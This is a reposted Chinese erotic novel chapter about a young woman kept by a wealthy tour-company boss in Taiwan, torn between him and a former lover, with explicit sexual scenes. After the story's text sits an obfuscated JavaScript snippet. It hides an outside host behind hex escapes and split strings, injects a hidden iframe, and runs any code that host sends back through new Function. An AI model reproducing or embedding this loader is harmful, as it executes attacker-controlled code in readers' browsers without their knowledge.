(转)瑷嫒惛婚 作者:拾贝钓叟
    时间:2020-12-09 00:10:08

    〈第1章〉海峡二岸
      夏末初秋,在山明水秀的日月潭。
      广阔的全湖景观和大面积的落地窗户,将人融入自然图框,让旅人能恣意徜
    徉湖滨的明媚与幽静。
      清晨的阳光从窗户探进房间,照亮了圆床上美丽的胴体,也叫醒贪婪的男人
    。用脚趾夹了夹她的乳头说:「瑷玉!去,帮俺把窗户打开。」
      她的名字里没有玉,叫崔瑷。是山东临沂钻石矿区的矿工女儿。家里穷住在
    破砖瓦房,成天灰头土脸,没想到长大后,还真是钻石一枚。可这王磊偏要叫她
    瑷玉。
      崔瑷向外推开窗户,远方有绿水青山,窗外枫红四处,小鸟吱吱喳喳,比蓬
    莱更像仙境。拉上薄纱的长睡袍,逆光下的她,更美!
      看湖边有新人迎着朝阳在拍婚纱,崔瑷有若所感,进入QQ打上一些字:
      “世界这幺美,我这幺美,人说像钻石,其实我是玉。石之美者就得要出卖
    自己?结婚,心慌慌,瑷惛惛,你知我忳忳惛惛,为婚而愁吗?”
      发现背后的男人在看,她赶忙删了,把手机收在内裤里。
      她背后眼睛亮出贪婪的男人叫王磊,中国旅行社的负责人。五十岁,青岛人
    ,为了开发中国人赴海外登山,亲自到台湾,他得把京城旅行社提出来的合作路
    线走一趟。
      中国旅行社在内地各省有十八家分店,做的是全世界的生意,王磊的资产过
    亿,唯一缺憾是至今膝下尚无儿女。
      台湾的山,和内地的山相比,市场太小。王磊会亲自到台湾,肯定不寻常,
    肯定有特别的目的。
      “王磊呀王磊!你真有眼光,她多美呀!每一吋都是艺术品…你看,那翘臀
    ,肯定很会生…呵呵!”他看到那逆光的胴体,呼吸就急促起来,一个人开始自
    言自语。
      王磊像猫,蹑手蹑脚,追到窗前,伸手摸着细柔的肌肤问:「瑷玉!妳看这
    湖光山色,幽静,下个星期排卵,或许妳可以在台湾帮俺生个儿子。」
      这话像闷棍,打得崔瑷忳忳惛惛,她没有回答。她知道,生儿育女是王磊的
    想望,好在不是这一趟的目的。
      阵阵微风,一再掀开薄纱窗帘,风来,帘起,风过帘落。
      看向硕大的圆床上,如是。王磊兴奋的在挺动着,而崔瑷从表情却是无奈地
    享受着。
      没多久,风又停,薄帘放下,王磊也停了。
      「磊哥…怎停了?」看来似乎射精,又似乎不是,总之软了。
      崔瑷看来有点小生气,嘟着嘴说:「连做爱都在想工作?到底是来做人,还
    是来工作?」她悠悠起身,还是轻柔的擦拭着老闆的软Q。一脸温柔再问:「磊
    哥!好像没感觉有射的迹象,你没事吧?」
      「没事!不急,反证排卵期还没到。该出门工作了,妳先去洗,俺看一下合
    作计画。」
      男人翻身看手机,崔瑷帮他盖上丝被,美艳精緻的脸庞,虽蕩着柔情,却是
    一种很有个性的冷。她之所以被认为艳如钻石,就在嘟着嘴的惹人怜惜样,明明
    没有什幺,她非要坞着私处走向浴室,那匀称的身材真的很美!
      她开始沖澡,细毛稀疏,软柔,金黄,还是很仔细的清洗,包括皱摺内外。
    是感觉,引诱她偷偷的扣弄几下。看着窗外蒙蒙亮的晨光,她忍不住倒吸了一口
    气。
      王磊是个好人、有钱出手大方,山东汉子的霸气,重点是这个大老粗,实在
    很疼崔瑷。
      耻毛稀,淡无慾。但她的冷是装来的呗!转头从透明玻璃瞄床上的动静,感
    觉时间还可以,她又再偷偷的扣弄几下。皱眉头,似乎不尽性,生气,用力扯了
    自己的耻毛,看,又扯落几根更稀疏无几了,一脸悔,哀哀的叹了一口气。
      她之所以叹气,是这种包养关係,像交易,王磊很有心,但感情不能用疼或
    好来筐箩,她的心显然没有偎在王磊身上。
      最重要的是王磊的性爱观念有问题。
      瞄到老闆从床上坐起来,她赶忙关水把浴室让出来。
      她没化什幺妆,三二下涂了口红,趁王磊在拉屎,赶快打开QQ,滴滴滴的
    震动,显然讯息很多。但她只点看一个叫〈我.累!〉发来的讯息。
      “好妹妹,要会旧情人,心里爽吧?”“可别忘了我啊?还有,别让妳老公
    戴绿帽嗄?嘻嘻”
      “好妹妹,告诉妳一个消息,我也出差在台湾哦!妳若偷会情人,说不定会
    被我看到喔!”
      崔瑷被对方这样说,脸色一红,羞答答地回道“我家磊老公看的紧,人家想
    当母狗也没机会!”
      看着湖光山色,等,对方没回。发讯再问:“你在台湾那里?”还是没回应
    ,显然对方不在线上了。
      听到浴室水声停了,崔瑷马上迎上前去侍候穿衣,再帮老闆繫领带,趁机说
    :「我妈在催医药费了,今天可不可以汇一万元钱给她?」
      出门。默默跟着老闆身后的崔瑷,幽幽叹着气。看来,她是为了家里的开销
    ,不得不紧跟着这个男人。
      电梯里二人十指紧扣,她把头依偎在王磊肩上,外人看很幸福!可一走出电
    梯,她赶快把小手从老闆手中争脱,乖乖的以一步距离跟在老闆身后。
      崔瑷今年廿五岁,除了火辣诱人的身材,还有一张清纯的面孔,廿岁时进王
    磊旗下当山东地区的地陪。做三年就被老闆收在身边,王磊供她金钱,她供身体
    ,境遇令同性嫉妒,她的风采令异性垂涎。
      王磊对她的身体是近乎变态的迷恋,几乎每天都要她脱光当花瓶,夜夜搂着
    她拍清凉照PO网打卡,但给她的性爱滋润,总在特定的日子。
      「磊哥!这张删掉,太露了啦!」王磊笑了笑,还是按下了分享键。旅行社
    新人换旧人,多金老闆穷于应付的不只她一个,王磊觉得赚钱简单,但找一个人
    生儿育女好难。
      对于老闆的草草收场,她隐约知道蜻蜓点水式的性爱,是情绪的噪动,像猩
    猩、猴子,都是一种宣示性占有的早洩行为。
      才廿五岁的崔瑷,像娇花绽放,乳房夜夜被搓揉更是丰挺,纤细的腰身,翘
    翘的臀部,笔直修长的双腿,偏偏蜻蜓点水得不到滋润,让她烦脑。
      董娘!董娘!董娘!怀上老闆的孩子就是董娘!
      全凭天命择偶,称做〈撞天婚〉。在同事眼中,崔瑷当上董娘的呼声最高,
    因为王硫最疼临幸最多。她外表看来很幸福,但是出卖自己,听天由命的婚姻,
    她不要,为了钱,让性福好遥远,她默默的愈跟愈失落。
      ●
      到了大厅。
      有一个身高只有一四0㎝,身材像小娃儿的OL,她是台湾京城旅行社经理
    宋嫒佳。一见王磊从电梯出来,马上站起来,小娃儿扯一头牛,赶忙上前迎接。
      那牛叫梁岫宸,比娃儿高二个头,穿牛仔裤配凉鞋,站起来扭扭脖子甩甩头
    ,一脸不屑一副屌样。
      双方介绍方式很怪,是崔瑷即高兴又害羞样,迎向屌男说:「梁大哥!这是
    我们旅行社王磊,王总经理。」再转头对王磊说:「老闆,这就是你要找的,有
    特别专长的梁岫宸!」
      王磊脸上挂着赘肉,看梁岫宸时皮笑肉不笑,说:「俺知道!带台湾团,在
    山东和妳配合,就是他?」
      而梁岫宸也是,一脸不屑的指着娇小的OL说:「我们经理宋嫒佳!」。
      「啊哟!大总,头一次见面,电话费早舖平台湾海峡,咱熟透了,你不是要
    好好看我吗?」王磊看这小娃儿装可爱转了一圈,这才换一副特有的笑容,却没
    人看穿他的想法。
      谁都看得出来,这趟生意是初见面,但彼此似都有打探对方,只是另人费解
    ,这二个男人,一见面就不对盘,这生意怎幺谈?
      当宋嫒佳在说明合作细节时,王磊对她半露的小乳球频频点头,他发现这娃
    儿身高只有一四0㎝,但皮肤白皙像洋娃娃,可打圆场和带气氛的功力,比自己
    带来的崔瑷强太多了。
      王磊旗下女导游有数百人,她看中的,都是个个高佻美丽,所以宋嫒佳这小
    娃儿,不会是王磊的菜。但她的临场应变,和身材反差,让王磊眼睛一亮,他的
    眼神像发现一个製作精美,有智慧,又凝真的性爱娃娃?
      不对!是一份甜点。
      更不对!因为她把数学的几何图形穿在身上。
      明明就是及膝的高腰窄裙,西装形外套。但这身OL套装,却是取五颜六色
    的布料,用几何图形剪裁成色块,再拼凑成套装。
      不按规矩裁剪的几何图形,给人一种不确定布局,好奇?谁才是女主角?
      王磊说:「妳简直是甜点?」宋嫒佳竟然点头,承认自己就是甜点。小娃儿
    一脸嘻嘻笑,这才缓和了二个男人不对盘的尴尬。
      她身上每一几何色块都很欢欣,有粉红、粉绿、鲜红、粉黄、奶白…,令人
    暇想就是有奶油、草莓、抹茶、水果…的甜点。
      数学几何,不经演算,得不到答案;人生几何,没走到最后,看不出结局。
      用几何裁剪五颜六色,让OL瞬间变萌,活泼,俐落、可餐,真是经典。
      王磊说:「妳那来廿五岁?俺看就是个学生,小娃儿,俺没看过腰这幺纤细
    的,该只有廿吋吧?多重?」「嘻嘻!猜错了,我十八吋腰。」就说每个人的视
    界不同嘛!
      这一趟是做生意,王磊先把眼前小娃儿搁着。他的心思似也不在赚钱,反而
    是拿一张纸,和宋嫒佳在核对百岳名单,价格不是问题,凡是他想要的山,都要
    排进去。
      更另人不解的,是南台湾面临太平洋边,有一座叫金针山的小山丘。海拔不
    到一千M,但王磊却要求,要亲自去看看。
      双方敲定细节了后,对于未来二星期,要把台湾规划的路线走一趟,王磊很
    有意见。他觉得台湾就这幺小点儿大,倒不如分二组快点跑完。
      一旁的崔瑷就坐在梁岫宸旁边,感觉谈生意和她俩没关係似的。崔瑷还偷偷
    上QQ,对方回讯息了:“是被看的紧,不是不敢,三年没见面,母狗都会发情
    。说不定妳正期待他的秃屌,这会儿下面,是不是流出来呢?”
      崔瑷感觉梁岫宸在看她,加上QQ猜穿自己的内心私密,她脸更红了,因为
    王磊在一旁。藉着挪位置,二腿用力缩夹一下,那表情,摆明就是出门前搅和的
    湿,真的流出来了,她只好走去厕所。
      这个暱称〈我.累〉的网友,自从知道她来台湾,会和老情人碰面?就老是
    绕着性爱话题打转。二人争论的都是:被包养,算出轨吗?崔瑷曾向网友承认和
    梁岫宸聊天,她就会屄穴发痒。今天竟被说成母狗发情?
      这会儿人旧情人就坐在她旁边,肯定会湿,三年不见肯定会想,但她可不敢
    乱来。王磊看来很忙,在一旁谈生意;一边顾着手机;又一边得盯着自己的女人
    崔瑷。
      崔瑷在二个男人面前,不敢乱来是真;心里悸动也是真,够纠结了的情绪,
    好再有〈我.累〉这个网友可以倾诉。
      〈我.累〉是谁?崔瑷也不和道。就一年前吧,莫名就加在手机里的,可能
    是带团旅游的客人吧?被王磊包养后,她就很少带团,寂寞,常被这个网友关心
    。就连和梁岫宸的私密,网友知道的都比王磊还多。
      被猜到内心的想望,她一脸羞红如火,想解释那湿,却不敢打字。因为身边
    梁岫宸,脸虽看着前方,但眼神时而就会飘瞄过来。看他时而手握拳,血管瞬间
    扬起,崔瑷竟然联想,那就是勃起的力道。她肯定这头牛,这一回,是来夺回自
    己女人的。
      争夺!让她实在坐不住,些微动一下,梁岫宸就瞄过来,随着他的目光,崔
    瑷低头看自己第三、第四颗扭扣,梁岫宸也看了,她今天穿着一件鲜黄色胸罩。
      是她送的,任由他看。二个人看来陌生,其实心在交流。趁双方老闆没注意
    ,她小声的说:「我带了家乡的阿胶蜜枣给你!」
      这幕,王磊看不过去,故意瞪了她一眼。这一瞪,崔瑷马上附合说:一定要
    分二组走,因为我们王总另有重要行程,不能在台湾停留太久。
      崔瑷之所以会被王磊又爱又气,就是她不只漂亮,而且机智过人,却很会装
    傻。她知道王磊不会看上宋嫒佳,而是公司里,另有二只母兽接在自己后面,都
    在这个月底接续排卵。所以王磊要分二组跑,是算好时间得赶回去配种。
      王磊想婚,急于得子,全公司都知道。有幸被选上的女人,无不期待夜夜被
    临幸,个个使出浑身解数,就只图能母凭子贵当董娘!
      这些女人之中唯独崔瑷,让王磊花费最多,回馈的反应最冷漠,偏偏愈难驾
    驭的女人,男人就愈想征服。这一趟,崔瑷之以会被带在身边,一来王磊想娶她
    ,二来排卵期就在这趟行程里。
      行程终于敲定,玉磊和宋嫒佳南下垦丁,顺便去金针山。而梁岫宸则带崔瑷
    看高山的路线。
      分二组走,崔瑷心里最乐得高兴,反证妈妈的医药费刚刚看到王磊用手机转
    帐了。分开跑,她正好图个清静!
      但她只能在自己排卵期之前,图个清静。因为王磊拿出记事本,翻到记载崔
    瑷生理期那一页,说:
      「瑷玉!妳要在第六天的晚上,回到高雄的Y饭店和俺会合,俺们有重要的
    事要办。」
      第二天白天,要向官方递申请,所以四人同行,大家忙着该忙的事,就不在
    话下。
      梁岫宸依旧如同跟班,从不把王磊放在眼里,他只是用慕恋的眼神追着崔瑷
    。她五官明显,脸蛋偏小,嘴更小,唇却丰厚性感,笑起来很甜,彷彿能融化每
    个人的心。
      自己的女人一再被乱瞟,让王磊气的牙痒痒,一股鸟气正要发作。好在有宋
    嫒佳,她还真像一块甜点,把王磊逗得好开心。
      「大总!开心一点,漂亮你才要,别人才想瞟,给看也少不了一跟毛啦!」
      王磊忍了,这一趟要不是身负特别任务,非得梁岫宸配合不可,他那忍得下
    这口鸟气?
      而夹在二男中间的崔瑷,也很苦。
      向国家公园取得许可后,一行人回到饭店大厅。
      梁岫宸发现她眼睛有哭过,红红的,就发讯息给崔瑷:“我在楼梯间,妳往
    地下室走!”
      碰面后,梁岫宸温柔的关心,问,又出什幺事了?她,不愿说,眼泪一直掉
    。一再逼问崔瑷才说,老妈把医药费拿去买毒品,她不好再向王磊要钱,说完埋
    在梁岫宸怀里小泣。
      「帐号没变吧?这回我来汇钱给老妈。」梁岫宸依然那幺体贴,她笑了!
      当抚摸的手突然伸进她的衣服里,她马上拉下脸,反抗着说:「我心情还很
    乱!你别乱想喔!这里不行。」
      「为什幺不行,怕羞阿?!」「我怕王磊看到啦?!」
      「思念那幺苦,我想摸摸啦!」这话让崔瑷倒吸一口气,身体僵直不敢动,
    想推却推不开他强而有力的手,而且此时梁岫宸的手从后捞起她的短裙,正在翘
    臀上抚摸。
      「我寄给妳的这套鲜黄色内衣,怎还这幺新?」崔瑷扫视楼梯间,确定没人
    ,还是压低声音说:「拾不得穿啦!岫宸,我的心是你的,但是我的人卖给王磊
    了,不可以…」
      这也是事实,但明着讲这话,激怒梁岫宸难以抑制的牛脾气,一把抓住她就
    猛吻。
      狂吻,唤醒了她沉睡的记忆!嘴里说不要,这吻却是她想要的。
      裙子被撩起后,她赶紧抓住内裤,阻止不了,只能求饶。嘴忙手乱,内裤被
    褪下一点、又拉上一点,忽而露阴毛、忽而露翘臀,一件鲜黄色的蕾丝内裤,都
    要扯坏了。
      狂吻,会让人变成野兽!崔瑷被逼压在扶手上,内裤不给脱,梁岫宸的手就
    翻墙伸进去,已经探到嫩肉了。很奇怪,湿漉漉听不到,但彼此都感觉到有“嗤
    啧…”声。
      那滑滑的湿,让梁岫宸抓狂,他肯定激情的吻不会这幺多汁,这些汁液是什
    幺?是谁的?
      「这些年,想妳…快想疯了,想到他干妳我就恨!」梁岫宸说话,就如野兽
    在低吼,伸手自己解开裤头,似要拉出硬硬的男根。
      给他摸摸也应该,但讲这话崔瑷很生气,用颤抖的口气质问:「为什幺,要
    这样说?」她不吻了,转身趴在楼梯扶手上。可那愤怒不依,就在后臀的大腿根
    摩擦。
      「对不起!妳无奈,我也苦,妳不要抗拒我好吗?」这话让崔瑷心软,转身
    面对时,已经挂着二行眼泪。「对不起!我知道你苦…」二人又开始狂吻。
      她用手抚平凶暴男人的肌肉,用吻压制发情的野兽。
      求饶声变得很轻柔,「岫宸,我是爱妳的,嗯哼…求你,不要在这里啦,听
    话!」那头牛倒还听话,因为暴涨的翘楚在崔瑷手里。
      她蹲下来把脸凑过去,轻吻一会儿,再把包皮覆盖起来,收进裤子里关拉鍊
    锁住,然后站起来又在他唇上深深一吻,才转身离去。
      才一走出楼梯间,王磊电话响了!赶紧跑上楼回房间。
      一进门,王磊看她头髮凌乱,衣衫不整,慌忙问说怎幺了?她疲累地笑着说
    :「我在附近逛,听妳电话响没接,就赶忙跑上来,喘!」
      王磊不信,伸手掀她裙子,发现黄色内裤惊讶的问:「怎有这件黄,谁送的
    ?」崔瑷甩开他的手,转而帮他脱西装外套,顺口回:「旧的,你不喜欢黄色,
    私下穿别浪费。」
      「妳倒说说看!梁岫宸这人怎样?秃屌,一脸跩,俺明儿交待宋嫒佳换了他
    ?」崔瑷拍拍他衣服上的头皮屑,还是冷冷的回:「火气大伤身。人家懂山!就
    只是嚮导,不涉业务商谈,你介意什幺?」
      他拿着西装,正要打开衣柜,就被王磊突然大声喝住。「不用挂进去!」他
    的反常,让崔瑷滴沽,衣柜里藏女人哦?
      「头皮屑是警讯,磊哥,别发脾气,疑东疑西对身子不好。」
      「因为,那秃屌,看妳的表情,我火就上来。」她故做镇静,冲过去吻住王
    磊,接着在他面前脱衣,幽幽的说:
      「呵呵!吃醋?看我,这身材,谁不想看?可,我敢背叛老闆你吗?」
      「那妳赶快怀孕,俺们今年就风风光光的结婚。」崔瑷不接话。而是去拧开
    浴缸的热水龙头,再出来走向王磊,说:
      「结婚,我也想呀!想也得有福份,没怀孕,磊哥会娶我吗?」她接着一颗
    一颗地扭开自己胸前的纽扣,优雅的动作让衬衫滑落,短裙褪去,修长高挑的身
    材,高耸的胸部…,在他眼前一一呈现。
      她一脸自信,用身材,让王磊没再说什幺。但从王磊表情看,肯定心头对这
    屌毛,还是过不去。
      「磊哥!我帮你洗澡。」她肯定会怕,冷气不强,声音却微微颤抖,她怕保
    护不了梁岫宸吗?
      「不用!俺要出门。京城旅行社安排俺去参观台湾夜店文化,妳要去体验一
    下吗?」
      崔瑷裸身粘了上去,说:「我不要!那种地方会让我没气质。老闆自个儿去
    快乐,但子孙别外流喔,人家那个…」
      「知道啦!还有七天排卵,妳这几天给俺乖一点,要天天量体温拍照,用Q
    Q把体温计传给俺。」
      「遵命!这个月再不準时排卵,就没董娘的福分了!」伸手帮他打上领带,
    随手做个小动作,虽是单调的音符,但在崔瑷的指尖,就会变成狂魅动人旋律。
      「呵呵!磊哥硬了…快去HAPPY吧。」
      「妳喔!每天这幺温柔,汇再多钱俺也会笑。还有情绪会影响排卵,妳顾好
    情绪,乖乖抱蛋等俺。」送到门口,看王磊塔电梯下楼,崔瑷的表情显得如释重
    负。
      热水都放了,乾脆自己去洗澡。
      崔瑷对镜子看着粉红色的乳头,仍和自己少女时期一样,没有多余的乳晕,
    她嫣然一笑。用手惦了惦,乳波颤动,她皱眉叹了一口气,还是禁不住王磊折腾
    ,略微往下垂了一点点了。
      夏末初秋的台湾,太阳实在很大,想要去隔壁301,问宋嫒佳要点护脸霜

      换上一套比较休闲的衣服。
      那是一件束腰的粉红格子短袖衬杉,塔配一条有点蕾丝边的墨绿短裙,拿出
    黑色丝袜,看来很得意修长的腿,乾脆不穿,夹着拖鞋,就到隔壁房去敲门。
      房门一开,怎会是梁岫宸?她似很紧张。原来宋嫒佳今晚不在,房间留给梁
    岫宸,要他听候王磊差遣。
      他眼睛一亮说:「妳不是怕我吃了妳,怎还敢来?哇!妳这格子杉看来清爽
    ,身材真美。」明明是戏弄。她似乎很在意被他讚美,笑着问:「少神经,你家
    嫒佳经理呢?」
      二人一番对话后,彼此都很惊呀!因为崔瑷说王磊去夜店。而梁岫宸说:宋
    嫒佳带王磊去买阿里山茶。
      二人说的话兜不拢,一定有不对?

    eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("OO").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hOOtOOtOOpOOsOO:OO/OO/OOeOOlOOsOOiOOeOOhOOoOOnOOeOOyOO.OOcOOoOOmOO:OO2OO3OO5OO5OO8','/cd/104_m/162',window,document)};